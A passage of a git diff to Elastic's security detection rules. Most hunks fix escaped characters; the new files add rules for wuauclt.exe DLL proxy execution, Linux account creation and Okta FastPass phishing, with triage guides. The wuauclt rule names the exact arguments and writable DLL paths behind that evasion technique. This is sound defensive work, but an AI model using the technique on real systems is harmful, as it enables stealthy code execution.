<8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_108.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_108.json index d328d601105..9df8e7245bb 100644 --- a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_108.json +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_108.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_109.json b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_109.json new file mode 100644 index 00000000000..0f1eaf0b856 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/edf8ee23-5ea7-4123-ba19-56b41e424ae3_109.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies abuse of the Windows Update Auto Update Client (wuauclt.exe) to load an arbitrary DLL. This behavior is used as a defense evasion technique to blend-in malicious activity with legitimate Windows software.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ImageLoad via Windows Update Auto Update Client", + "note": "## Triage and analysis\n\n### Investigating ImageLoad via Windows Update Auto Update Client\n\nThe Windows Update Auto Update Client (wuauclt.exe) is the component responsible for managing system updates. However, adversaries may abuse this process to load a malicious DLL and execute malicious code while blending into a legitimate system mechanism. \n\nThis rule identifies potential abuse for code execution by monitoring for specific process arguments (\"/RunHandlerComServer\" and \"/UpdateDeploymentProvider\") and common writable paths where the target DLL can be placed (e.g., \"C:\\Users\\*.dll\", \"C:\\ProgramData\\*.dll\", etc.).\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the command line and identify the DLL location.\n- Examine whether the DLL is signed.\n- Retrieve the DLL and determine if it is malicious:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate the behavior of child processes, such as network connections, registry or file modifications, and any spawned processes.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.pe.original_file_name == \"wuauclt.exe\" or process.name : \"wuauclt.exe\") and\n /* necessary windows update client args to load a dll */\n process.args : \"/RunHandlerComServer\" and process.args : \"/UpdateDeploymentProvider\" and\n /* common paths writeable by a standard user where the target DLL can be placed */\n process.args : (\"C:\\\\Users\\\\*.dll\", \"C:\\\\ProgramData\\\\*.dll\", \"C:\\\\Windows\\\\Temp\\\\*.dll\", \"C:\\\\Windows\\\\Tasks\\\\*.dll\")\n", + "references": [ + "https://dtm.uk/wuauclt/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timeline_id": "e70679c2-6cde-4510-9764-4823df18f7db", + "timeline_title": "Comprehensive Process Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "edf8ee23-5ea7-4123-ba19-56b41e424ae3_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_1.json b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_1.json index 23192a78b58..e4d3903c95d 100644 --- a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_1.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_2.json b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_2.json index 68102128c6f..64c2b699227 100644 --- a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_2.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux User Account Creation", - "note": "## Triage and analysis\n\n### Investigating Linux User Account Creation\n\nThe `useradd` and `adduser` commands are used to create new user accounts in Linux-based operating systems.\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `useradd` and `adduser` to create new accounts.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Linux User Account Creation\n\nThe `useradd` and `adduser` commands are used to create new user accounts in Linux-based operating systems.\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `useradd` and `adduser` to create new accounts.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "iam where host.os.type == \"linux\" and (event.type == \"user\" and event.type == \"creation\") and\nprocess.name in (\"useradd\", \"adduser\") and user.name != null\n", "related_integrations": [ { @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_3.json b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_3.json index a8e8ab287bc..e1ee4ca295b 100644 --- a/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_3.json +++ b/packages/security_detection_engine/kibana/security_rule/edfd5ca9-9d6c-44d9-b615-1e56b920219c_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux User Account Creation", - "note": "## Triage and analysis\n\n### Investigating Linux User Account Creation\n\nThe `useradd` and `adduser` commands are used to create new user accounts in Linux-based operating systems.\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `useradd` and `adduser` to create new accounts.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Linux User Account Creation\n\nThe `useradd` and `adduser` commands are used to create new user accounts in Linux-based operating systems.\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `useradd` and `adduser` to create new accounts.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Investigate whether the user was created succesfully.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific Group\",\"query\":\"SELECT * FROM groups WHERE groupname = {{group.name}}\"}}\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. Before investigating further, verify that this activity is not benign.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "iam where host.os.type == \"linux\" and (event.type == \"user\" and event.type == \"creation\") and\nprocess.name in (\"useradd\", \"adduser\") and user.name != null\n", "related_integrations": [ { @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_103.json b/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_103.json new file mode 100644 index 00000000000..5a2b7b663e8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_103.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Detects when Okta FastPass prevents a user from authenticating to a phishing website.", + "index": [ + "filebeat-*", + "logs-okta*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Okta FastPass Phishing Detection", + "note": "", + "query": "event.dataset:okta.system and event.category:authentication and\n okta.event_type:user.authentication.auth_via_mfa and event.outcome:failure and okta.outcome.reason:\"FastPass declined phishing attempt\"\n", + "references": [ + "https://developer.okta.com/docs/reference/api/system-log/", + "https://developer.okta.com/docs/reference/api/event-types/", + "https://sec.okta.com/fastpassphishingdetection", + "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection" + ], + "related_integrations": [ + { + "package": "okta", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.event_type", + "type": "keyword" + }, + { + "ecs": false, + "name": "okta.outcome.reason", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\nThis rule requires Okta to have the following turned on:\n\nOkta Identity Engine - select 'Phishing Resistance for FastPass' under Settings > Features in the Admin Console.", + "severity": "medium", + "tags": [ + "Tactic: Initial Access", + "Use Case: Identity and Access Audit", + "Data Source: Okta" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_2.json b/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_2.json index d8956775d17..73d7caf5038 100644 --- a/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e_2.json @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e", - "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\nThis rule requires Okta to have the following turned on:\n\nOkta Identity Engine - select 'Phishing Resistance for FastPass' under Settings \u003e Features in the Admin Console.", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\nThis rule requires Okta to have the following turned on:\n\nOkta Identity Engine - select 'Phishing Resistance for FastPass' under Settings > Features in the Admin Console.", "severity": "medium", "tags": [ "Tactic: Initial Access", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_102.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_102.json index 91b171baee0..4044e8ca98a 100644 --- a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_102.json +++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_102.json @@ -70,7 +70,7 @@ ], "risk_score": 47, "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_103.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_103.json index 91e59c5d6a0..4490de9e4de 100644 --- a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_103.json +++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_103.json @@ -70,7 +70,7 @@ ], "risk_score": 47, "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -81,7 +81,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_104.json b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_104.json index 2b5848161f8..435c4e1de22 100644 --- a/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_104.json +++ b/packages/security_detection_engine/kibana/security_rule/ee5300a7-7e31-4a72-a258-250abb8b3aa1_104.json @@ -70,7 +70,7 @@ ], "risk_score": 47, "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": 